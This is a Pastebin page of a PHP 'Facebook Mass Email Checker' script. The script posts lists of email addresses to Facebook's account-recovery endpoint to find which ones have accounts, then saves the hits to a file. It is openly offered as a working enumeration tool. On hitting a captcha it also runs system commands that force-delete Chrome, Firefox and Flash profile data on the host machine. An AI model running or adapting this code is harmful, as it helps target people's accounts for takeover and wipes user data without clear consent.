Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- #########################################
- #Facebook Mass Email Checker
- #Coded By H4T3D
- #Previous Bug Fixed
- #Can Check Large Number Of Emails
- #Changing name wont make You Coder
- #img >> http://i.imgur.com/SkLbQ3d.png
- ###########################################
- ob_start();
- @set_time_limit(0);
- error_reporting(0);
- echo "
- <head>
- <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
- <title>Facebook Mass Email Checker - H4T3D</title>
- <form method='POST'>
- </head>
- <style>
- textarea {
- background:#000000;
- resize:none;
- color: #00FF00 ;
- border:1px solid red ;
- border: 4px solid red ;
- }
- input {
- color: ##33CCFF;
- border:1px dotted #33CCFF;
- width: 20%;
- }
- html, body{
- background:#000000;
- color:#00FF00;
- font-family:monospace;
- height: 100%;
- text-decoration: none;
- }
- </style>";
- echo "
- <center><h1>Facebook Mass Email Checker Upgraded - H4T3D</h1></center>
- <p dir='ltr' align='center'>
- <textarea cols='35' class='area' rows='22' name='username'>[email protected]\[email protected]\[email protected]\[email protected]\[email protected]\[email protected]\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]\r\[email protected]</textarea>
- <br>
- <br><a href='foundemails.html'>Found Emails</a></br>
- <br>
- <input type='submit' name='scan' value='Start Scaning'><br></p>";
- if(isset($_POST['scan'])){
- function brute($user){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login/identify/?ctx=recover");
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,false);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "lsd=AVpNLmOr&charset_test=€%2C´%2C€%2C´%2C?%2C?%2C?&email=$user&did_submit=Search");
- curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
- curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
- curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
- $login = curl_exec($ch);
- $check2 = (eregi('class="captcha"',$login)) ? true:false;
- if($check2 == true)
- {
- system('del /q /s /f "%ChromeDir%"');
- system('rd /s /q "%ChromeDir%"');
- system('del /q /s /f "%DataDir%"');
- system('rd /s /q "%DataDir%"');
- system('for /d %%x in (C:\Users\%USERNAME%\AppData\Roaming\Mozilla\Firefox\Profiles\*) do del /q /s /f %%x\*sqlite');
- system('set FlashCookies=C:\Users\%USERNAME%\AppData\Roaming\Macromedia\Flashp~1');
- system('del /q /s /f "%FlashCookies%"');
- system('rd /s /q "%FlashCookies%"');
- if(stristr(php_uname(),"Windows"))
- {system("del cookie.txt");}
- else if(stristr(php_uname(),"Linux"))
- {system("rm cookie.txt");}
- die("<center><h2>Security Check Has Been Detected</h2></br>PlZ Delete Cookies And Try Again !!</center> ");
- }
- $check = (!(eregi('HTTP/1.1 302 Found',$login))) ? true:false;
- if($check == true){
- echo "<p align='left' dir='ltr'><font face='Arial Black' color='red'>INVALID: Username : <font color='red'>$user</font></p>";
- flush();@ob_flush();
- }else{
- echo "<p align='left' dir='ltr'><font face='Arial Black'>VALID: Username: <font color='green'>$user</font></p>";
- flush();@ob_flush();
- $myfile = fopen("foundemails.html", "a") or die("Unable to open file!");
- fwrite($myfile,$user);
- fwrite($myfile,"</br>");
- fclose($myfile);
- }
- }
- $username = explode("\n", $_POST['username']);
- foreach($username as $users) {
- $users = @trim($users);
- echo brute($users);
- }
- }
- echo"<br>
- <br>
- <br>
- <br>
- <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>UPGRADED BY H4T3D http://pastebin.com/u/H4T3D</font></b></p></center>";
- ob_end_flush();
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement